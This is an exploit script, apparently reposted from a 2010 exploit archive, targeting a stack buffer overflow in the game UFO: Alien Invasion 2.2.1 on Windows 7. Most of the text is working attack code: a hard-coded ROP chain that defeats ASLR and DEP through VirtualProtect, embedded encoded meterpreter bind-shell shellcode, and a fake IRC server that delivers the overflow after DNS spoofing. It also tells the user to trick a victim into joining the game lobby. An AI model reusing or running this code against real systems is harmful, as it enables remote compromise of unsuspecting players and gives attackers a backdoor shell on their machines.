UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP Bypass)
Posted on 05 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP Bypass)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>
=================================================================
UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP Bypass)
=================================================================
#!/usr/bin/python
#
# Exploit Title: UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP Bypass)
# Date: July 5, 2010
# Author: Node
# Software Link: http://sourceforge.net/projects/ufoai/files/UFO_AI%202.x/2.2.1/ufoai-2.2.1-win32.exe/download
# Version: "UFO: Alien Invasion 2.2.1 x86 Apr 28 2008 Win32 RELEASE"
# Tested on: Windows 7 Ultimate x64 ENG
# CVE : none listed
# Max shellcode size: 328 bytes
# Badchars: '\x00\x0a\x0d'
# Instructions: 1. DNS spoof/redirect "irc.freenode.org" to your IP
#               2. Have the victim click "Multiplayer" and then "Lobby"
#
# Notes: This exploit may work on a different Windows version by changing the
# low bytes of 0xffff34ec to the low 16 bits of VirtualProtect()'s address in
# that version's kernel32.dll. The chain only patches the low word of a
# kernel32 pointer it recovers at runtime, which is why it survives ASLR:
# Windows randomises the module base, but the low 16 bits of an exported
# function's address are fixed for a given kernel32.dll build. The gadget
# addresses themselves are hard-coded, so the chain also depends on the game's
# own DLLs (e.g. SDL_mixer.dll) loading at a fixed base on the target.
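import socket
import struct
import sys

# --- Constraints carried over from the exploit header ------------------------

# Bytes that must not appear in the served reply before its CRLF terminator
# (the header's badchar list; the gadget addresses, the NOP pad and the
# msfencode'd shellcode were all chosen to avoid them).  The original never
# checked this; build_payload() does.
BAD_CHARS = b"\x00\x0a\x0d"
# Header: "Max shellcode size: 328 bytes".  The chain stores dwSize = 0x148
# (328) in the VirtualProtect frame, so that is the span it marks executable.
MAX_SHELLCODE_SIZE = 328
# The second chain must start this many bytes after the first one begins; the
# gap is filled with NOPs.  The original silently produced an empty pad (and a
# misaligned second chain) if the first chain ever outgrew this.
STAGE1_SIZE = 552
# The overflow is delivered as an IRC numeric 001 reply with a ":" trailer.
REPLY_PREFIX = b"001 :"
LINE_END = b"\x0d\x0a"
LISTEN_PORT = 6667

# msfpayload windows/meterpreter/bind_tcp LPORT=4444 R | msfencode -b '\x00\x0a\x0d' -t c
# [*] x86/shikata_ga_nai succeeded with size 326 (iteration=1)
SHELLCODE = (
    b"\xbf\xb7\x89\xfe\x0e\xda\xd3\xd9\x74\x24\xf4\x2b\xc9\xb1\x4b"
    b"\x5e\x83\xc6\x04\x31\x7e\x11\x03\x7e\x11\xe2\x42\x75\x16\x87"
    b"\xac\x86\xe7\xf8\x25\x63\xd6\x2a\x51\xe7\x4b\xfb\x12\xa5\x67"
    b"\x70\x76\x5e\xf3\xf4\x5e\x51\xb4\xb3\xb8\x5c\x45\x72\x04\x32"
    b"\x85\x14\xf8\x49\xda\xf6\xc1\x81\x2f\xf6\x06\xff\xc0\xaa\xdf"
    b"\x8b\x73\x5b\x54\xc9\x4f\x5a\xba\x45\xef\x24\xbf\x9a\x84\x9e"
    b"\xbe\xca\x35\x94\x88\xf2\x3e\xf2\x28\x02\x92\xe0\x14\x4d\x9f"
    b"\xd3\xef\x4c\x49\x2a\x10\x7f\xb5\xe1\x2f\x4f\x38\xfb\x68\x68"
    b"\xa3\x8e\x82\x8a\x5e\x89\x51\xf0\x84\x1c\x47\x52\x4e\x86\xa3"
    b"\x62\x83\x51\x20\x68\x68\x15\x6e\x6d\x6f\xfa\x05\x89\xe4\xfd"
    b"\xc9\x1b\xbe\xd9\xcd\x40\x64\x43\x54\x2d\xcb\x7c\x86\x89\xb4"
    b"\xd8\xcd\x38\xa0\x5b\x8c\x54\x05\x56\x2e\xa5\x01\xe1\x5d\x97"
    b"\x8e\x59\xc9\x9b\x47\x44\x0e\xdb\x7d\x30\x80\x22\x7e\x41\x89"
    b"\xe0\x2a\x11\xa1\xc1\x52\xfa\x31\xed\x86\xad\x61\x41\x79\x0e"
    b"\xd1\x21\x29\xe6\x3b\xae\x16\x16\x44\x64\x3f\xe6\x61\xd4\x28"
    b"\x0b\x95\xca\xf4\x82\x73\x86\x14\xc3\x2c\x3f\xd7\x30\xe5\xd8"
    b"\x28\x13\x5a\x70\xbf\x2b\xb5\x46\xc0\xab\x90\xe4\x6d\x03\x72"
    b"\x7f\x7e\x90\x63\x80\xab\xb0\xf4\x17\x21\x51\xb7\x86\x36\x78"
    b"\x2d\x49\xa3\x87\xe7\x1e\x5b\x8a\xde\x69\xc4\x75\x35\xe2\xcd"
    b"\xe3\xf5\x9d\x31\xe4\xf5\x5d\x64\x6e\xf5\x35\xd0\xca\xa6\x20"
    b"\x1f\xc7\xdb\xf8\x8a\xe8\x8d\xad\x1d\x81\x33\x8b\x6a\x0e\xcc"
    b"\xfe\x6a\x72\x1b\xc7\xe8\x82\x2e\x2b\x31\x60"
)


def _dw(value: int) -> bytes:
    """Pack *value* as a little-endian dword, as it sits on the x86 stack."""
    return struct.pack("<I", value & 0xFFFFFFFF)


# --- Gadgets -------------------------------------------------------------------
# Addresses and per-gadget descriptions are the original author's.  They are
# hard-coded, so the chain relies on these modules loading at the same base on
# the target (only 0x6176e005 is attributed to a module, SDL_mixer.dll, in the
# listing).  None of the addresses contains a bad byte.
PAD = b"A" * 4                                  # filler consumed by POP gadgets
PUSH_ESP_POP_EBX_EBP = _dw(0x6170C95A)          # PUSH ESP # POP EBX # POP EBP
ADD_ESP_1C = _dw(0x686C14D6)                    # ADD ESP,1C
WRITABLE = _dw(0x6176E005)                      # writable dword in SDL_mixer.dll
MOV_EAX_EBX_POP2 = _dw(0x68105745)              # MOV EAX,EBX # POP EBX # POP EBP
MOV_EDX_EAX = _dw(0x68105BDD)                   # MOV EDX,EAX # MOV EAX,EDX
INC_EDX = _dw(0x67583472)                       # INC EDX # DEC EAX
MOV_EAX_200 = _dw(0x675851B8)                   # MOV EAX,200
MOV_ECX_EAX = _dw(0x686C3371)                   # MOV ECX,EAX # MOV EAX,ECX
ADD_ECX_ECX = _dw(0x6171F9E3)                   # ADD ECX,ECX
XOR_EAX_EAX = _dw(0x68102353)                   # XOR EAX,EAX
ADD_EAX_20 = _dw(0x67584950)                    # ADD EAX,20
XCHG_EAX_EBP = _dw(0x68138C6B)                  # XCHG EAX,EBP
ADD_ECX_EBP = _dw(0x61725425)                   # ADD ECX,EBP
MOV_EAX_ECX = _dw(0x686C3373)                   # MOV EAX,ECX
MOV_EAX_2 = _dw(0x67585128)                     # MOV EAX,2
ADD_ECX_EAX_MOVZX = _dw(0x67589F6F)             # ADD ECX,EAX # MOVZX EAX,CX
POP_ECX = _dw(0x67598D9C)                       # POP ECX
WRITE_WORD_POP2 = _dw(0x61719BEE)               # MOV EBX,EDX # SUB EBX,EAX # MOV EAX,EBX # MOV WORD PTR DS:[ECX+44],AX # ADD ESP,4 # POP EBX # POP EBP
MOV_EAX_PTR_EAX = _dw(0x68110167)               # MOV EAX,DWORD PTR DS:[EAX]
ADD_EBP_EBX = _dw(0x68131F6A)                   # ADD EBP,EBX
POP_EBX = _dw(0x686C13E2)                       # POP EBX
XOR_AL_AL_POP_EBP = _dw(0x70803542)             # XOR AL,AL # POP EBP
ADD_AL_BL = _dw(0x686D4D02)                     # ADD AL,BL
MOV_CH_BH_MOV_ESP_EBP = _dw(0x6170A534)         # MOV CH,BH # ADD AL,BYTE PTR DS:[EAX] # MOV ESP,EBP # POP EBP
MOV_PTR_EDX_ECX = _dw(0x67584BB9)               # MOV DWORD PTR DS:[EDX],ECX
MOV_PTR_EDX_EAX = _dw(0x67585126)               # MOV DWORD PTR DS:[EDX],EAX # MOV EAX,2
LEAVE = _dw(0x686DCDC6)                         # LEAVE
XCHG_EAX_ESP = _dw(0x6813367A)                  # XCHG EAX,ESP
SUB_EDX_EAX = _dw(0x68133D52)                   # SUB EDX,EAX # MOV EAX,EDX

# VirtualProtect() is found at 0x????34ec in the tested kernel32.dll.  Only the
# low word is patched into a kernel32 pointer the chain reads at runtime (the
# author's "grabbing kernel32" section), so on another Windows build replace
# the low 16 bits with that build's value.
VIRTUALPROTECT_LOW_WORD = _dw(0xFFFF34EC)


def build_rop_stage1() -> bytes:
    """Return the first ROP chain, the one the overwritten return address runs.

    Section labels are the original author's.  As far as the listing shows,
    the chain reserves a VirtualProtect call frame at the top of the stack
    (the "1111".."5555" placeholders plus lpflOldProtect), obtains a kernel32
    pointer and patches its low word to VirtualProtect, stores that pointer,
    the shellcode address (twice: return address and lpAddress) and dwSize
    into the frame, and finally jumps forward into the second chain.
    """
    chain = [
        PUSH_ESP_POP_EBX_EBP,       # start: EBX = ESP
        PAD,                        # -> EBP
        ADD_ESP_1C,                 # hop over the VirtualProtect frame below
        b"1111",                    # VirtualProtect placeholder
        b"2222",                    # return address placeholder
        b"3333",                    # lpAddress placeholder
        b"4444",                    # dwSize placeholder
        b"5555",                    # flNewProtect placeholder
        WRITABLE,                   # lpflOldProtect
        PAD,
        MOV_EAX_EBX_POP2,
        PAD * 2,
        MOV_EDX_EAX,
        INC_EDX * 8,                # EDX -> the "1111" slot
        # grabbing kernel32
        MOV_EAX_200,
        MOV_ECX_EAX,
        ADD_ECX_ECX * 2,
        XOR_EAX_EAX,
        ADD_EAX_20 * 5,             # A0
        XCHG_EAX_EBP,
        ADD_ECX_EBP,
        XCHG_EAX_EBP,
        ADD_EAX_20 * 3,
        XCHG_EAX_EBP,
        ADD_ECX_EBP,                # 9a0
        MOV_EAX_ECX,
        XCHG_EAX_EBP,
        MOV_EAX_2,
        MOV_ECX_EAX,
        ADD_ECX_ECX * 3,
        XCHG_EAX_EBP,
        ADD_ECX_EAX_MOVZX,
        POP_ECX,
        WRITABLE,                   # -> ECX
        WRITE_WORD_POP2,
        PAD * 3,
        MOV_EAX_PTR_EAX,            # author: "VirtualProtect()"
        MOV_ECX_EAX,
        PUSH_ESP_POP_EBX_EBP,
        PAD,
        XOR_EAX_EAX,
        ADD_EAX_20 * 3,
        XCHG_EAX_EBP,
        ADD_EBP_EBX,
        MOV_EAX_ECX,
        XCHG_EAX_EBP,
        MOV_ECX_EAX,
        XCHG_EAX_EBP,
        POP_EBX,
        VIRTUALPROTECT_LOW_WORD,    # -> EBX
        XOR_AL_AL_POP_EBP,
        PAD,
        ADD_AL_BL,
        XCHG_EAX_EBP,
        MOV_EAX_ECX,
        XCHG_EAX_EBP,
        MOV_ECX_EAX,
        MOV_CH_BH_MOV_ESP_EBP,
        PAD * 4,
        MOV_PTR_EDX_ECX,            # store VirtualProtect in the frame
        # fetch shellcode
        PUSH_ESP_POP_EBX_EBP,
        PAD,
        INC_EDX * 4,
        MOV_EAX_EBX_POP2,
        PAD * 2,
        XCHG_EAX_EBP,
        XOR_EAX_EAX,
        POP_EBX,
        _dw(0xFFFFFFAC),            # 0xac * 2 = 0x158
        ADD_AL_BL,
        MOV_ECX_EAX,
        ADD_ECX_ECX,
        MOV_EAX_ECX,
        XCHG_EAX_EBP,
        ADD_ECX_EAX_MOVZX,          # ECX -> shellcode
        MOV_PTR_EDX_ECX,
        # again
        INC_EDX * 4,
        MOV_EAX_ECX,
        MOV_PTR_EDX_EAX,
        # set dwSize 0x148 (328)
        INC_EDX * 4,
        XOR_EAX_EAX,
        POP_EBX,
        _dw(0xFFFFFFA4),            # 0xa4 * 2 = 0x148 (328)
        ADD_AL_BL,
        MOV_ECX_EAX,
        ADD_ECX_ECX,
        MOV_EAX_ECX,
        MOV_PTR_EDX_EAX,
        # forward jump
        XOR_EAX_EAX,
        POP_EBX,
        _dw(0xFFFFFF70),            # 0x70
        ADD_AL_BL,
        PUSH_ESP_POP_EBX_EBP,
        PAD,
        XCHG_EAX_EBP,
        ADD_EBP_EBX,
        LEAVE,
        PAD,
    ]
    return b"".join(chain)


def build_rop_stage2() -> bytes:
    """Return the second ROP chain, placed STAGE1_SIZE bytes after the first.

    Section labels are the original author's: a "backjump" pivot, the write of
    flNewProtect = 0x40 into the frame (the "(land here)" entry point), and the
    final pivot that hands control to the prepared VirtualProtect frame.
    """
    chain = [
        # backjump
        PUSH_ESP_POP_EBX_EBP,
        PAD,
        MOV_EAX_EBX_POP2,
        PAD * 2,
        MOV_EDX_EAX,
        MOV_EAX_200,
        ADD_EAX_20,
        POP_EBX,
        _dw(0xFFFFFF0C),            # 12
        ADD_AL_BL,
        POP_ECX,
        WRITABLE,                   # -> ECX
        WRITE_WORD_POP2,
        PAD * 3,
        XCHG_EAX_ESP,
        # set flNewProtect 0x40 (land here)
        INC_EDX * 4,
        XOR_EAX_EAX,
        ADD_EAX_20 * 2,             # 0x40 = PAGE_EXECUTE_READWRITE
        MOV_PTR_EDX_EAX,
        # ending
        MOV_ECX_EAX,
        ADD_ECX_ECX * 3,
        MOV_EAX_ECX,
        SUB_EDX_EAX,
        XCHG_EAX_ESP,
    ]
    return b"".join(chain)


def build_payload(shellcode: bytes = SHELLCODE) -> bytes:
    """Assemble the reply: "001 :" + stage 1 + NOP pad + stage 2 + shellcode + CRLF.

    Args:
        shellcode: bad-char-free code of at most MAX_SHELLCODE_SIZE bytes;
            defaults to the bundled meterpreter bind_tcp stub.

    Returns:
        The complete line to send to the connecting client.

    Raises:
        ValueError: if stage 1 no longer fits in STAGE1_SIZE, if *shellcode*
            is longer than the region the chain makes executable, or if any
            BAD_CHARS byte occurs before the terminating CRLF.
    """
    stage1 = build_rop_stage1()
    if len(stage1) > STAGE1_SIZE:
        raise ValueError(
            f"stage 1 is {len(stage1)} bytes, exceeds STAGE1_SIZE={STAGE1_SIZE}"
        )
    if len(shellcode) > MAX_SHELLCODE_SIZE:
        raise ValueError(
            f"shellcode is {len(shellcode)} bytes, max is {MAX_SHELLCODE_SIZE}"
        )
    body = (
        REPLY_PREFIX
        + stage1
        + b"\x90" * (STAGE1_SIZE - len(stage1))
        + build_rop_stage2()
        + shellcode
    )
    found = [f"\\x{b:02x}" for b in BAD_CHARS if b in body]
    if found:
        raise ValueError("payload contains bad chars: " + ", ".join(found))
    return body + LINE_END


def serve(port: int = LISTEN_PORT, bind_addr: str = "") -> None:
    """Wait for one client on *port* and send it the exploit reply.

    Binds every interface by default, as the original did; pass *bind_addr*
    to restrict it.  Blocks until a client connects, then returns.
    """
    payload = build_payload()
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((bind_addr, port))
        listener.listen(1)
        print(f"[*] Listening on port {port}.")
        print("[*] Have someone connect to you.")
        print("[*] Type <control>-c to exit.")
        conn, addr = listener.accept()
        # The original wrote `conn.close` (no call) and so never closed it.
        with conn:
            print("[*] Received connection from:", addr)
            # send() may return after a partial write; sendall() loops.
            conn.sendall(payload)


def main() -> None:
    """Script entry point: serve one client, exit quietly on Ctrl-C."""
    try:
        serve()
    except KeyboardInterrupt:
        sys.exit(0)


if __name__ == "__main__":
    main()

# Inj3ct0r.com [2010-07-05]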